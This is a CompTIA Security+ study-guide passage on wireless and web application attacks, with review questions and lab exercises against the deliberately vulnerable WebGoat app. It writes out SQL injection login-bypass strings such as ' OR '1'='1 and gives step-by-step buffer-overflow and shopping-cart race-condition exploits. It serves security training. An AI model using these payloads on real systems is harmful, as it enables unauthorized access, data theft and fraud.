Exam Objective: CompTIA SY0-501 1.2.3


The most obvious difference is that any attacker in range of a wireless network can connect or eavesdrop
without looking for a port or wire. That alone is most of the reason why access control and encryption is much
more prominent in Wi-Fi technology than it is in Ethernet, but those measures still make sniffing far easier
than on a wired network. MAC addresses aren't encrypted so can be targeted by MAC spoofing attacks. Some
versions of Wi-Fi encryption are vulnerable to replay attacks. Others are password-based, and weak
passwords can potentially be cracked.
Wi-Fi intruders very often aren't malicious, but are instead just looking for free Wi-Fi so they can access the
internet. That doesn't mean they're no problem: intruders of any kind consume network resources, and there's
no way to tell that someone is "only" a freeloader. In addition to intrusion itself, there are other common
wireless attacks; some are unique to wireless technologies, while others are variants of existing wired attacks.

Wardriving An attacker physically searching an area for wireless hotspots, typically but not always
from a moving vehicle. The attacker uses an ordinary mobile device with Wi-Fi capability,
running an application designed to identify and map Wi-Fi networks. The name comes
from wardialing, an old hacking technique for discovering phone numbers with listening
modems by dialing many numbers in sequence. Malicious wardrivers may go a step
further, and try to compromise the security of WAPs as they find them.
Encryption Secured Wi-Fi networks encrypt all traffic, but the available encryption standards have
attacks known vulnerabilities, some serious.
 Like any password-based security, pre-shared key (PSK) based security is easy to
crack if the password is easy to guess, but that's only the start.
 The first Wi-Fi encryption standard, WEP, has serious vulnerabilities in its
initialization vector (IV) setup process. Using replay attacks, an attacker can
trivially break WEP no matter how strong the password is.
 The newer WPA and WPA2 standards are stronger than WEP, but still have
problems. Not only can a weak password still be cracked, they support two
encryption modes, TKIP and AES. While AES is very strong, TKIP has similar
(though much less severe) IV vulnerabilities to WEP.
 The Wi-Fi Protected Setup (WPS) feature intended to allow administrators to easily
join trusted devices to the network contains a major vulnerability. When enabled, it
effectively provides an alternate password, with a flaw that renders it easy for a
determined attacker to brute force crack in a matter of hours.

Rogue AP An unauthorized WAP connected to the wired network, commonly by an employee or


other insider. Like a rogue server, a rogue AP doesn't have to be malicious to be a threat: it
introduces new avenues of attack to the rest of the network, and might not be properly
secured by its owner.
Evil twin A rogue AP that has the same SSID and security settings as a legitimate AP, so that users
might connect to it instead of the real one. The evil twin's controller can use it to launch
MiM attacks on anyone who connects to it instead of the real AP.

CompTIA Security+ Exam SY0-501 91


Chapter 2: Understanding attacks / Module D: Network attacks

Disassociation Sending a packet with a spoofed address that de-authenticates a client from a Wi-Fi
network. This attack can be launched by anyone in range of the hotspot, even if it's an
encrypted connection. Disassociation can be used as a DoS attack on its own, or to set up
evil twin or encryption attacks when the client tries to reconnect.
Jamming Since wireless networks are subject to interference from other radio sources and tend to
use popular portions of the radio spectrum, an attacker can jam the signal by introducing a
competing one, as a physical layer DoS attack.
Bluejacking Sending unsolicited messages to a Bluetooth device. Usually harmless, but can be
considered intrusive or annoying.
Bluesnarfing Unauthorized theft of information from a Bluetooth device. Newer mobile devices are
more resistant to this, but older software can be vulnerable.
NFC Extremely close range Near Field Communication is harder to eavesdrop or intrude on
than other wireless technologies, since the attacker has to get within inches of the target.
However, since NFC is intended for sensitive communications like payment or
authentication systems, it's a prime target for attackers. Emerging NFC attacks could allow
attackers to steal information or money from vulnerable smartphones even in their users'
hands or pockets, using a combination of protocol exploits and pickpocketing technique.
RFID NFC is only one subset of the larger field of Radio frequency identification technology.
Others are used for tracking goods and devices, electronic locks, toll collection, and
tracking people or animals. Most other RFID technologies work at a longer range than
NFC and many have fewer security features, so they can be even more at risk. On the
other hand, most RFID technologies support more limited communications than NFC and
carry less sensitive information.

92 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module D: Network attacks

Assessment: Network attacks


1. Complex passwords that are combinations of upper and lower case letters, numbers, and special
characters protect your system from which types of attacks?
 Birthday
 Brute force
 Dictionary
 Man-in-the-middle
 Zero-day

2. As a user, what can you do to protect yourself from man-in-the-middle attacks? Choose the best response.
 Avoid connecting to open WiFi routers.
 Avoid following links in emails when possible.
 Enable Firewall protection.
 Install only the application software you need.
 Use complex passwords that are combinations of upper and lower case letters, numbers, and special
characters.

3. What tools allow amplification of a DoS attack? Choose all that apply.
 Bluesnarfing
 Botnets
 Malformed packets
 Reflection
 VLAN hopping

4. Evil twins are mostly used as part of what kind of attack? Choose the best response.
 Denial of service
 Man-in-the-middle
 Phishing
 Trojan horse

5. What kind of attack is against a software vulnerability which hasn't been patched yet? Choose the best
response.
 DDoS
 Pharming
 Smurf
 Zero day

CompTIA Security+ Exam SY0-501 93


Chapter 2: Understanding attacks / Module E: Application attacks

Module E: Application attacks


As operating systems and core networking protocols have become more secure, hackers increasingly are
turning their attention toward new targets. Web browsers and server applications are one of the most tempting
targets, not least because so much commerce, financial, and personal data today is available on the web.
Common vulnerabilities in rapidly evolving software or the ways multiple applications interact both allow
many ways that an attacker can manipulate applications, steal data, or gain system access. As a result, in
recent years web application attacks have become one of the most common vectors for damaging data
breaches.
You will learn:
 About application vulnerabilities
 How application attacks do damage
 About server-side injection attacks
 About client-side attacks

About application vulnerabilities


There isn't a clear boundary between application attacks and attacks at the application layer of the network. In
general, "application attacks" refers to attacks exploiting web applications and browsers, associated databases
and scripting languages, and so on, regardless of the underlying network protocols being used. Not that it
really matters: if you're securing the network properly you'll be securing the network as a whole by examining
all of its layers.
Some common network attack strategies can be either classified as application attacks, or used as part of one.
DoS attacks can be used to impair or disable web services. Stolen or easily guessed passwords can work on
web-based authentication systems just as well as on a remote access program. Spoofing attacks and insecure
protocols can allow for eavesdropping, man-in-the-middle, or session hijacking.
Attacks on the protocols and languages used by web applications themselves are also common. Some rely on
coding flaws built into a given application or protocol: maybe it responds inappropriately to certain input, or it
uses trust mechanisms that are easy to exploit. Others rely on common or default but unsafe application
settings which can be exploited. Many web applications actually involve a number of applications and
components working together, often even from different vendors, and every intersection of components is
another place where a vulnerability might exist.
At the core, most vulnerabilities are based on applications and protocols that are too trusting of the input they
receive, especially from seemingly authenticated sources. The cause could be an oversight, since it can be
difficult to anticipate all the ways unexpected input could cause an error or breach. Robust design can even
contribute to vulnerabilities: an application that attempts to process improperly formatted input as best it can
is more compatible with other applications or components that produce non-standard output. The problem
with trust and flexibility in application design is the same as that with human behavior against social
engineering—as beneficial as they are in a trusting environment, as soon as you encounter a malicious actor
you're going to be hurt.

94 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Application exploits
Like any other sort of attack, application attacks can be categorized different ways: attack vectors, end goals,
technical mechanisms, targeted applications, and so on. Common attack goals include the following:

Exam Objective: CompTIA SY0-501 1.2.2.8, 1.6.7

Privilege escalation Gaining increased privileges within an existing session, for example accessing
administrator-only commands from an ordinary user account. Privilege escalation
vulnerabilities can turn even restrictive guest access into a perfect foot in the door for
an attacker, and they're a factor in many other attacks.
Directory traversal Accessing directories on the client machine that normal applications do not. For
example, when you interact with a web server you can normally only access files in
its web folders. A directory traversal attack could let an attacker access the server's
root folder, and from there everything else on the machine.
Arbitrary code Executing machine code of your choice on a remote computer, also known as remote
execution code execution. This is the most dangerous result of an application attack, since in
conjunction with privilege escalation it can give the attacker full control of the
remote computer.
Resource exhaustion Just like network systems, an application can be overwhelmed by malicious requests
that consume its resources until it either crashes or is just too busy to respond
properly to legitimate users. The attacker requests could be designed to generate
errors, consume excessive CPU time or memory space, or there just may be so many
incoming requests that the host computer can't keep up. This isn't very likely to result
in a data breach unless the application fails in an insecure way, but it's an effective
denial of service attack.

Input manipulation
Anyone who can access a web application has to work through its available input methods. Insecure
applications allow many ways an attacker can send malicious input.

Exam Objective: CompTIA SY0-501 1.2.2.5, 1.6.3

Header manipulation Changing values in the headers used by a communication protocol, either one
directly used by an application or by the underlying network layers. MAC and IP
address spoofing are examples of header manipulation, as are Xmas attacks and
other non-standard flag use. Session hijacking attacks frequently rely on TCP
header manipulation.
Memory manipulation Sending input into a program that will affect variables and other values in memory,
either to produce unexpected behavior or to crash the application as a denial of
service attack.
Injection A broad term for sending specially formatted input that will be processed by some
sort of command interpreter within the web application or its host machine. In
general, injection relies on command languages used within the server itself but not
intended to be entered in user input fields, such as SQL, XML, or even command
line syntax.

CompTIA Security+ Exam SY0-501 95


Chapter 2: Understanding attacks / Module E: Application attacks

Memory vulnerabilities
Applications can be attacked through how they use memory. Depending on the vulnerability type, attackers
can use malicious input, or can use an already-compromised application to attack other applications or the
host machine.

Exam Objective: CompTIA SY0-501 1.2.2.4, 1.6.12

Buffer overflow Sending too much information in a request sent to an application, enough to overfill the
memory buffer meant to store it and overflow into adjacent memory. For example, an
attacker could upload a large file where the application expects a short string of text.
Vulnerable applications react badly to buffer overflows: they might have predictable
failures attackers can exploit, or unpredictable ones attackers can gamble on. The most
serious enable arbitrary code execution by reading the overflow as a program to run.
Integer overflow Setting an integer variable to a value that exceeds the maximum size set aside to store
it, usually through addition or multiplication functions. Unlike a buffer overflow, an
integer overflow doesn't spread into other memory. It just makes the number "wrap
around." For example, an unsigned 8-bit variable allows values between 0 and 255. If
you push it up to 256, the application will read it as 0, potentially causing undesired
behavior.
Pointer dereference Many programming languages use pointer variables that reference another value held
somewhere in memory. In those languages you can dereference a pointer, or directly
retrieve the value it points to. Programs can also have null pointers that don't point to
valid memory values but are useful in other ways. An attacker manipulating a
vulnerable application can potentially force it to dereference a null pointer, generating
an error that can crash the application. Alternatively, it might bypass a security
function, or return useful debug information to an attacker.
Memory leak Programs are supposed to allocate memory when they need it, and release it when
they're done with it. Coding errors can cause an application to allocate memory but
never release it, effectively "leaking" system memory into the program over time and
eventually consuming all so much memory that the application or even the host crashes.
An attacker can manipulate vulnerable applications to leak memory as a denial of
service attack.

Race conditions
Race conditions are one of the most commonly exploited application vulnerabilities, behind overflow and
injection attacks, but the reasons why might be a little less clear when you're not a programmer. Programs,
like other processes, are full of tasks that have to occur in a certain order, even if you don't do one
immediately after another. Imagine you're making soup. You have to taste the soup, and if it's bland you add
some salt. Assuming you have a perfect, computer-like memory there's no reason for you to do it immediately.
Instead you can go and chop some ingredients on the countertop, then bring the salt on the way back.

Exam Objective: CompTIA SY0-501 1.6.1


Add a busy kitchen with many people working on the same dishes, and things can go wrong. You might taste
it, find out it needs salt, then before you get around to adding it someone else tastes the soup and adds salt.
Not knowing this, you add more salt, and now the soup has too much. This is a race condition. More
specifically, it's called a time of check to time of use (TOCTOU) error, since something changed between when
you checked something (the soup's saltiness) and used the result of the check (by adding salt.)
This sort of race condition is a constant risk in computing just because most computers are like that busy
kitchen, with multiple programs running simultaneously and at immense speeds. The timing of when
programs use the processor is controlled by the operating system, so programs could potentially interfere with
each other. Even a delay of a few milliseconds a human wouldn't notice is enough time for a computer to do a

96 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

lot of work. For example, it's possible for a program to check the contents of a file, decide on a change it
wants to make, but then due to processor scheduling a different program edits the same file before the first
program applies the change. Such a condition could lead to incorrect contents, or even a corrupt and
unreadable file. This is why operating systems frequently lock a file for editing, so that only one application
can alter it at a time.
Modern computers have even more opportunities to generate race conditions too. Not only can powerful
servers have multiple CPUs that can execute programs simultaneously, new desktop and mobile computers
have multi-core CPUs that individually behave as multiple processors. To take advantage of this, many
applications generate multiple processing threads that are scheduled and run on different cores like
independent processes. This means even within a program a race condition might be difficult to avoid.
None of this so far is specific to security, outside of how bugs and corrupted data damage availability, but it's
possible for a race condition to compromise security. It's even possible for an attacker to manipulate a race
condition deliberately. For example, a keylogger could be used to exploit a race condition in an two-factor
authentication system by observing a single-use token being typed in, then submitting the code on the
attacker's behalf before the user can to hijack the session. Other race conditions can be exploited to cause
integer overflows, or to dereference null pointers.
Another possibility is manipulating the order of operations in e-commerce applications. In an extreme case,
an attacker could use the right input to make a small purchase, choose a payment method, then add a lot of
expensive items to the cart in the brief moments while the payment card is being processed. When the card is
approved, the vulnerable application doesn't realize the cart contents have changed, so it marks the whole
order as approved and ready to ship for the cost of the original small order.
There isn't a single fix for race conditions. The circumstances that made them possible are deeply ingrained
into how high performance computers work, and they're notoriously hard to recognize or reproduce. It's
possible to make application or operating system safeguards against specific examples of race conditions, but
in the general case it's something that can only be prevented by secure application design.

Exercise: Exploring application vulnerabilities


For this exercise you'll need to use the Dojo VM. In this exercise you'll test two application attacks in Web
Security Dojo, a self-contained training environment which has both penetration testing tools and vulnerable
web applications.

CompTIA Security+ Exam SY0-501 97


Chapter 2: Understanding attacks / Module E: Application attacks

Do This How & Why

1. In the Dojo VM, start WebGoat. WebGoat is a deliberately insecure web application OWASP
uses to demonstrate application vulnerabilities.

After a few moments, WebGoat opens in Firefox.


a) Click > Targets > WebGoat
NG Start

b) Sign in with username guest and The main application opens. WebGoat contains lessons for a
password guest wide variety of application flaws.

c) Examine the WebGoat interface. In the center is an explanation of how to use WebGoat. The left
pane is a lesson list, and the right pane is a list of cookies and
parameters currently being used by the site.

2. Create a buffer overflow error. By sending too much information in a form field or other
input, you can make vulnerable applications behave in
unintended ways.

a) In the navigation pane, click Buffer


Overflows > Off-by-one
overflows

This application manages a purchase page for hotel Wi-Fi.


You've been told that by putting bad data into the form fields
you can get it to reveal information about other customers.

b) Enter your first and last name. Or whatever name you like.

c) In the Room number field, enter at It's easiest to create that many by copying and pasting inside of
least 4100 characters. a text file, then pasting it into the field.

d) Click Submit. To move to the next page of the form. You're asked to choose a
plan type.

e) In Firefox, click Tools > Web This Firefox extension allows you, or any other attacker, to
Developer Extension > Forms > view and alter a variety of web page information normally
Display form details hidden by the user.

The form is still is keeping the data you entered on the last
page, in order to submit it all at once. It's just hidden from you
normally.

f) Hide form details. Click Tools > Web Developer Extension > Forms > Display
form details.

98 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Do This How & Why

g) Click Accept terms. To finish the purchase. No error displays, but WebGoat
informs you that your attack worked.

3. View all customer names. The buffer overflow allowed you to display all user names.

a) Show form details again.

The buffer overflow error made the application return a full list
of guests and their rooms, as hidden fields within the page.
One of them is racing driver Lewis Hamilton.

b) Hide form details.

c) Click Restart Lesson. To return to the first page of the form. To finish the lesson, you
must enter Lewis Hamilton's information.

d) Enter Hamilton's information.

He's in room 9901.

e) Click Submit, then Accept Terms. Even a seemingly minor PII breach like this could expose a
guest to a stalker or thief. If you ran this hotel, you'd be
responsible for protecting your guests' privacy against this sort
of intrusion. To complete the lesson.

4. Begin a fraudulent purchase. For your next attack, you'll generate a TOCTOU error in a
vulnerable e-commerce app to get a fraudulent discount on an
expensive item.

a) In the navigation pane, click This application is the shopping cart for a web store. There are
Concurrency > Shopping Cart four available items, each with its own price.
Concurrency Flaw.

b) In the navigation pane, right click To perform this attack you need to have two copies of the page
Shopping Cart Concurrency open. The website associates both of them with your user
Flaw and click Open Link in New account.
Tab.

CompTIA Security+ Exam SY0-501 99


Chapter 2: Understanding attacks / Module E: Application attacks

Do This How & Why

c) In the first browser tab, enter 1 in


the first Quantity field.

The 750 GB hard drive is the least expensive item in the list.

d) Click Purchase. You're asked to complete your purchase by entering payment


information.

5. Exploit a race condition.

a) Switch to the other tab. It still shows your empty shopping cart.

b) Add a Sony Vaio to your cart. Type 1 in the third Quantity field, but don't click anything yet.

c) Click Update Cart.

To update your cart contents. It now shows a much more


expensive laptop in your cart.

d) Switch to the first tab. It shows your confirmation screen. It hasn't updated, so it
shows your payment information and a total of $169.00.

e) Click Confirm. Careless coding allows a wide range of race conditions which
could allow theft, privilege escalation, or data theft. To
complete your purchase. Since the last update of your cart
placed a laptop in it, you've ordered that, but since the
confirmation screen had the price of a hard drive the store only
charges you a fraction of the real cost.

6. Close one tab. Leave the other open for the next exercise.

100 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

SQL injection
One of the most common and dangerous attacks facing web applications today is SQL injection, but in order
to understand what it is, you need to know a bit about how web applications work.
Most websites and applications communicate with online databases to generate page content. This is
immensely important on today's web, and not just for filling out forms. When you load up your page on
Facebook, the actual HTML and CSS source code doesn't define more than a blank framework with spaces
for your news feed, friends list, trending stories, and so on. Actually populating all those areas is the job of
scripts, which make queries against the enormous databases Facebook uses to store all of its users, posts, and
so on. Even much of the HTML framework is actually called up by scripts. Likewise, when you search for
products on a web store, database queries are used to search the product database and load up any matching
results. Large or small, any website that delivers dynamic content relies on combining front-end server code
with a back-end database. The most common way for front-end and back-end systems to communicate is
Structured Query Language (SQL), an ISO standard used by most relational database software.
When used normally, SQL commands are generated by some mix of the page's scripts and the client's input,
all in a controlled manner. Imagine a user-based web application that uses a simple script to call up all
information associated with an account. When Bob logs in with his password 'P@ssw0rd' (Bob isn't that good
at choosing passwords), the resulting SQL query will look something like this:
SELECT * FROM users WHERE name='Bob' AND password='P@ssw0rd';

Without special security measures, the server will assume any query it receives from the client is valid, and
pass it on to the database. In this case, the database sends all Bob's data as long as his password matches, and
refuses if it doesn't. This might seem secure, but it has a big vulnerability. In an SQL injection attack, an
attacker carefully crafts input from the browser to the web server, forming SQL commands that the page
would never generate in normal operation. Depending on the exact structure of the site this might involve
specialized tools, or it might just be a matter of typing just the right things into website fields or even the

CompTIA Security+ Exam SY0-501 101


Chapter 2: Understanding attacks / Module E: Application attacks

browser address bar. Either way, since the server trusts the client's input, it's easily manipulated into doing
things that it shouldn't.
Now imagine that Craig wants to log into Bob's account and get his private information. He could try
guessing Bob's password, but he's learned about SQL and realizes he doesn't have to. He manipulates his
browser into sending the following command:
SELECT * FROM users WHERE name='Bob' AND password='' OR '1'='1';

The "OR '1'='1'" part inserts a condition that's always true, since 1 is always equal to 1. Trusting that the
web page was deliberately designed to do this, the server retrieves Bob's information from the database, and
sends it to Craig's browser. Now Craig can read all of Bob's private messages without even knowing his
password. But then he gets even cockier. Why not log into the administrator's account by guessing what the
user name is?
SELECT * FROM users WHERE name='Admin' AND password='' OR '1'='1';

Even if he got the account name wrong, Craig could try again with 'Administrator' or 'root' or something, and
once he does he's achieved a privilege escalation attack by gaining access to any information and permissions
only the administrator has. But Craig still isn't done, and he sends one more SQL injection.
SELECT * FROM users WHERE name='' OR '1'='1' AND password='' OR '1'='1';

This bypasses both user name and password checks, requesting all information for all users.
Commerce websites are especially popular targets of SQL injection attacks, since they're obvious places to try
stealing products or customer financial information, but any server is at risk. Many of the largest and most
damaging data breaches of modern years were caused by attackers exploiting simple SQL vulnerabilities.

SQL injection techniques


SQL injection is a powerful tool, enough that a simple example of bypassing authentication doesn't really
encompass the damage it can do. By using different SQL commands, an attacker can accomplish any task
someone with direct access to the database can do: access and modify records, gain privileges, even delete the
entire database.
Injected queries don't even have to perform normal database tasks to help an attacker. The details of an error
message can reveal information about database structure or software functions, helping the attacker design a
better-targeted command. Other nonstandard queries can access shell commands on the server to create a
backdoor, or even enable remote code execution.
Since the web server, the database, and the programming languages connecting the two each can vary from
site to site, SQL injection attack and defense strategies vary according to the syntax and vulnerabilities of
each component. Hackers can put a lot of effort just into learning exactly what software they're attacking.
 Popular web servers include Apache, Nginx, and Microsoft-IIS.
 Popular SQL databases include Oracle, MySQL, and Microsoft SQL server.
 Popular programming frameworks include PHP, Ruby on Rails, ASP, and Python Django.

Regardless of the exact goals, attackers use a number of common techniques to perform SQL injections.
They're not all mutually exclusive: a given attack might include multiple strategies.

102 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Unfiltered escape If an input field includes special characters used by SQL or the scripting language, they
characters might be taken as part of a command rather than as data. Well-designed applications use
escaping techniques to encase or substitute those characters so that they're clearly data
rather than commands. For instance, the apostrophe is used to surround strings in SQL,
so entering "O'Neill' in a name field could cause errors—instead, most software will
double the character and store the value as "O''Neill". If escape techniques for special
characters are poorly implemented or easily circumvented, attackers can inject code
into data fields.
Improper input Applications should check that any data inputs are of the right type, but they often don't
types do so reliably. If the application is too trusting, an attacker could for example enter a
string into a numeric data field either to generate a useful error or to alter the query.
Stacked queries Appending additional forged queries onto the original legitimate one. Without input
filtering, a semicolon tells SQL that the query is over and a new one is beginning. Since
the following query can be anything the attacker wants, it's a powerful technique when
it's executed.
Blind injection Securely designed production servers hide SQL error messages from end users in order
to prevent attackers from using them to gain information. In blind injection, attackers
use statements that should create verifiable changes in page output, or else perform
time-intensive operations and watch for server delay. Blind injection can be slow, but it
allows information gathering even on well-guarded servers.
Signature evasion Among other attacks, network intrusion detection systems often monitor web traffic for
signs of SQL injection. More sophisticated attacks carefully format queries to avoid
matching IDS signature files, while still working the same on the server.

Many web applications are vulnerable to SQL injection, and there's usually no good excuse for it. While
secure coding takes a careful and methodical approach, most of what allows injection attacks to work is pretty
simple to protect against. A secure web application does the following things:
 Sanitizes input by filtering or substituting dangerous characters that could modify SQL queries.
 Validates input by making sure all data is in the expected format before submitting it as a query.
 Restricts privileges both of users, and of the application itself, to limit the damage an injection can do.
 Restricts end-user error information to the minimum, preventing hackers from using error messages to
learn about server vulnerabilities.

Following all of these principles doesn't protect a web application against all vulnerabilities, but it undercuts
most of the tools attackers use against SQL.

CompTIA Security+ Exam SY0-501 103


Chapter 2: Understanding attacks / Module E: Application attacks

Other injection attacks


SQL is the most common and highest risk injection target, but it's not the only one. Several other technologies
can be targeted by injection: in fact, any time user-supplied data is sent to an interpreter as part of a command,
injection is theoretically possible. Likewise, the risk of any injection attack can be minimized by input
validation and other secure coding practices.

NoSQL injection Non-SQL or Not Only SQL is a term used for a variety of database that's become
popular more recently. While SQL databases store data in fixed, relational tables,
NoSQL uses a variety of non-relational data models. While not suited for everything
SQL can do, NoSQL has strong performance advantages for the massive amounts of
data used in some web applications. It can also be easily scaled across multiple servers.
NoSQL uses different query languages than SQL, but the structure and vulnerabilities
tend to be quite similar.
LDAP injection Lightweight Directory Access Protocol is frequently used for network directory
services, such as accessing user names and passwords, corporate email directories,
system and network information, and so on. This makes it a natural fit for many web
applications, but just like SQL if it's not carefully secured an injection attack can make
off with all sorts of valuable data.
XML injection eXtensible Markup Language is a tagged markup language, designed to be both
human- and machine-readable. It's related to HTML, but more general-purpose, and is
used for all sorts of documents, databases, and other web application data storage.
While XML queries are much different from SQL queries, the principles and exploits
are similar.
Command injection When an application allows data to be passed to a command shell on the server, an
injection attack can execute operating system commands. Especially in conjunction
with directory traversal or privilege escalation, this isn't an attack against the
application or database, but a way into the server itself.
DLL injection Inserting code into a running process by forcing it to load executable code from a
shared library file, such as the dynamic-link library files used by Windows. This
injection can be used for privilege escalation or any other sort of unintended behavior.
DLL injection is frequently used as a malware vector or payload, but can also be
triggered for example by a buffer overflow attack against a web application.

104 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Exercise: Examining SQL injection attacks


You should have just completed the "Exploring application attacks" exercise. If you have not, you'll need to
start the Dojo VM and launch WebGoat. In this exercise you'll demonstrate an SQL injection attack against
WebGoat.
Do This How & Why

1. Start and SQL injection lesson in WebGoat is a deliberately insecure web application OWASP
WebGoat. uses to demonstrate application vulnerabilities.

a) In the left pane, click Injection WebGoat contains several SQL injection vulnerabilities. You'll
Flaws. try a simple string injection.

b) Click Stage 1: String SQL


Injection.

WebGoat displays a login page.

2. Launch an SQL injection attack.

a) Examine the login page. It displays a list of employees as well as a password field.
You'll use an injection attack to log in without a password.

b) In Firefox, click Tools > SQL The SQL Inject Me browser sidebar opens. It's a tool meant to
Inject Me > Open SQL Inject Me test injection vulnerabilities, but that also makes it an attack
Sidebar. tool.

c) In WebGoat, select Neville You'll use the attack tool to bypass the password.
Bartholomew from the user list.

CompTIA Security+ Exam SY0-501 105


Chapter 2: Understanding attacks / Module E: Application attacks

Do This How & Why

d) In the Password field of the sidebar,


select or type 1' OR '1'='1

A vulnerable application will parse this as part of an SQL


statement that says the password is valid if it is 1, or else if
1=1. In other words, it will always be true.

e) On the web page itself, click Login. A secure application would validate and sanitize input in a way
to prevent this particular attack.

You successfully log into the application as an administrator,


displaying the staff listing page.

3. View staff information.

a) Select any employee in the list and By logging in as an administrator, you can view and edit each
click ViewProfile. user's private information, including SSN and credit card
number.

b) Close the SWL Inject Me window. Leave WebGoat open for the next exercise.

106 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Client-side attacks
Traditionally, hackers focused on server-side attacks. Much like the old joke about robbing banks, servers are
where all the data is, so they're an obvious target. As common and damaging as attacks like SQL injection still
are, they're also becoming harder to do. More mature applications with strong security settings, protected by
specialized web application firewalls, just aren't as vulnerable as the early Web 2.0 servers of fifteen years
ago. Many hackers have responded by using client-side attacks designed to compromise the client
applications which connect to those servers, either to steal information directly from those users, or to get
legitimate users themselves to unwittingly manipulate server applications.
Client-side attacks can target vulnerabilities in any sort of application running on client computers. Web
browsers and browser add-ons are the most obvious targets, but email clients, instant messaging clients, office
applications, and media players are also at risk. Often they're used to inject malware, or malware is used to
create vulnerabilities for other attacks.
One of the most common types of client-side attack is the sort of content spoofing normally classified among
network or social engineering attacks. Phishing is a client-side attack that works by concealing the identity of
a fake URL or website from the user, either by just "looking right" or by actively circumventing browser
protections that would reveal its illegitimate nature. Pharming does the same at a lower level, by manipulating
the system hosts file or DNS server so that attempting to navigate to a legitimate site actually redirects the
user to a malicious one.

CompTIA Security+ Exam SY0-501 107


Chapter 2: Understanding attacks / Module E: Application attacks

Elements used by client-side attacks include:

Application Any sort of application that communicates with the network can be targeted for attack.
vulnerabilities Even network services and lower levels of the TCP/IP stack on a client computer might
have potential vulnerabilities.
Browser add-ons Plugins and other add-ons intended to modify and expand browser capabilities can
themselves be exploited. Flash and Java are two examples of application environments
designed to run inside the browser: while both are intended to run their applications in
sandboxes isolated from the rest of the system, numerous exploits in both over the
years have allowed malicious programs, sometimes concealed in website ads or games,
to escape the sandbox and even execute arbitrary code on the client system.
Malicious add-ons If vulnerable add-ons weren't bad enough, users can be tricked into installing add-ons
which are malware in themselves. They might conceal their installation, or might
masquerade as helpful tools, but they allow attackers to manipulate browser behavior
or further compromise the system.
Cookies Browsers store small text files named cookies relevant to the websites a user visits.
Some are short-term, used for authentication and session identification purposes.
Others are longer-term, used to store website preferences or track browsing behavior.
Either can potentially be security or privacy risks, and to make things more
complicated, many websites won't work if cookies are disabled in the browser.
Local Shared Pieces of data stored on local computers by Flash applications. Sometimes called
Objects (LSO) Flash cookies, since they behave similarly to HTTP cookies. They can save settings or
track behavior, and older browsers had less ability to control or delete LSOs than
cookies.
Attachments Email attachments, and more broadly any files introduced onto the system, can
potentially carry viruses or other harmful content.

Cross-site scripting
One of the most common web attacks today is cross-site scripting, also known as XSS (to avoid confusion
with the non-malicious CSS, also used in browsers.) XSS is an injection attack, but instead of targeting the
server-side scripting languages like PHP or Python, it attacks the client-side scripting languages, like
JavaScript, which browsers use to render dynamic web pages. Broadly speaking, XSS is closely related to
content spoofing, but instead of serving up a page from a different site, the attacker inserts scripts into a page
sent from a legitimate site to a vulnerable third party. The victim's browser then runs the scripts, trusting them
just like it would any normal scripts from the server.

Exam Objective: CompTIA SY0-501 1.2.2.6


Since the victim's browser gives the injected scripts the same permissions it would legitimate scripts from the
same server, they can do anything the site itself could. While that usually doesn't mean full system access,
modern JavaScript is pretty powerful. Potential results include:
 Accessing the site's tracking cookies to steal user information
 Stealing session cookies to allow a session hijacking attack
 Read or make arbitrary modifications to the contents of the page the script is running in
 Send HTTP requests to arbitrary destinations
 Access other system resources the user has given the legitimate site permission to use, like webcams,
microphones, or local files

108 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Since XSS targets the browsers of end users, it often includes a social engineering component. An XSS attack
might alter the page to prompt the user into entering credentials or other valuable data, or request access to
system resources for a seemingly legitimate reason. Other times, XSS quietly spies and steals, without the
user seeing anything visibly different. XSS is especially dangerous when it targets an administrator or other
superuser, since the attacker can steal administrative credentials.

XSS techniques
There are a variety of XSS techniques, but they're typically classified by just how the attack script interacts
with the server before it reaches the target's browser.

Stored The attacker somehow uploads the script to the server where it can be viewed as content on a
vulnerable web page. Usually it's placed somewhere any common user can add content: a
comment field, message forum, social media profile, or the like. It's also called a persistent
attack, since the page with the script can remain online indefinitely and affect anyone who
views it. Since it's persistent, and the attacker doesn't have to target anyone specific, stored
XSS vulnerabilities are the most serious kind.
Reflected The attacker places the script into a server request that will cause it to be displayed verbatim
on a web page. For example, an input might generate an error message showing exactly what
input caused it, or a search result might show the exact contents of the search field. Since it's
not placed permanently on the site, this is called a non-persistent attack; this also means that
the attacker needs some other way to get the target client to actually view it. Usually this
works by tricking the victim into clicking a malicious link, visiting a malicious site, or
submitting a specially designed form. Since they have to be targeted and typically rely on
social engineering as well as application vulnerabilities, reflected attacks are individually less
dangerous than stored attacks, but they're far more common.
DOM-based Traditional stored and reflected attacks both pass the malicious script through a legitimate
application server on the way to the target. DOM-based attacks never touch the server, but
take place entirely in the Document Object Model (DOM) browsers use to render content. For
example, like a reflected attack, a DOM-based attack might begin with a malicious link sent
to the target. The link points to the legitimate server, but instead of the script "bouncing" off
the server, it's loaded directly into the vulnerable browser and executed as though it were part
of the page all along. Unlike a traditional XSS attack, DOM-based attacks don't rely on
dynamic server pages: they can even "infect" static HTML.

Defenses against traditional XSS are partly similar to those against server-side injection techniques: data
sanitation and input validation can block many attacks, and intrusion prevention systems or web application
firewalls can detect and block suspicious Javascript from being served to clients. Since DOM-based XSS
never touches the server, all defense techniques have to be performed on the client side: options include
client-side data validation, restricting cookie permissions, or even disabling scripts on sites that don't need
them.

Cross-site request forgery


A related, but separate, attack to XSS is Cross-Site Request Forgery (CSRF or XSRF). Like XSS it's an attack
on a legitimate session between a legitimate web server and another user, but where XSS exploits the user's
trust of the site, XRSF exploits the site's trust of the user, forging or altering requests from the client to the
server within the context of the session.

Exam Objective: CompTIA SY0-501 1.2.2.7


In the classic XSRF attack, the user receives a link to an attacker's site. Hidden on the web page is code that
instructs the user's browser to make requests to another server with an open session (including a valid
authentication cookie) with that user's permissions. For example, the XSRF attack could capture information

CompTIA Security+ Exam SY0-501 109


